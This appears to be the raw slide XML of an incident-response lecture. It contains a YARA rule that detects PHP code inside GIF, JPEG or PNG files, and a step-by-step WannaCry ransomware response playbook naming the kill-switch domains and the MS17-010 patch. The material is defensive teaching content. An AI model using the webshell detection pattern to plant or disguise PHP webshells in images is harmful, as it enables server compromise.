            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php_in_image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    strings:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        $gif = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/^GIF8[79]a/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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jfif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ff d8 ff e? 00 10 4a 46 49 46 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>89 50 4e 47 0d 0a 1a 0a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">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php_tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "&lt;?php"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    condition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">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(($gif at 0) or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"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jfif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> at 0) or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"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png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> at 0)) and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"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php_tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">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F8DB2DAA-CD29-A04A-B5C5-C94EA7CE755E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548384" y="134112"/>
            <a:ext cx="6528816" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/Yara-Rules/rules/blob/master/webshells/WShell_PHP_in_images.yar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16869827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38FF-C7BA-9F4C-B845-6CAD1368AF6E}"/>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A883D81D-C395-A84C-8FDD-4948948F11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33592"/>
            <a:ext cx="7897544" cy="5390815"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37880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0: Notification of Ransomware infection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Step 1: Stop it from spreading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Unplug network cable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Verify where you are blocking SMB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Review network logs for connections to other hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224621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2:  Discover and Patch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If not already patched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> patch MS17-010 on uninfected hosts in the same network (hopefully this has long since been done)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Scan network (w/ vulnerability scanning tool) for other potentially vulnerable hosts </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164165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3: Sinkhole kill-switch domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to a local server you control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41899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4: Hunt down other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> infections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Check IPS logs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, MS17-010, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Check DNS logs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>queries for kill switch domains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Check Web Proxy logs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>hits to kill switch domains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354713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4: Hunt down other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> infections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If you have an endpoint system that can look for indicators of compromise (IOCs) search for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> file hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301587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5: Review backups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Verify that backups were not encrypted by Ransomware, delete bad backups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Recover needed data from good backups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36121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Incident Response and Investigations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2270642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6: Lessons learned and improvement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Reduce attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Restrict ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Stronger IPS rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Segment network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Patch patch patch!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Endpoint protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595638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Ransomware Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Step 7: User education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Educate them on the issue, if you see something say something, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1905851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Playbooks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Start small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> pick a simple issue/report, tune, and operationalize.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Develop escalation procedures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> who handles the event?  Where is it passed to?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Establish relationships </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> know who to go to when incidents occur and maintain those relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Always be syncing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> keep your timestamps true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395037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Maintaining Playbooks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Keep them running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> as systems change/update keep your playbooks up to date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Keep them fresh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> as attacks change and system are retired, you need to retire old playbooks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124297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C3B2-F147-3C46-A125-1D89D3C3983A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More on Playbooks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4750E264-211A-E241-A709-DEA8C9C82CD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bollinger, Enright, and </a:t>
            </a:r>
            <a:r>
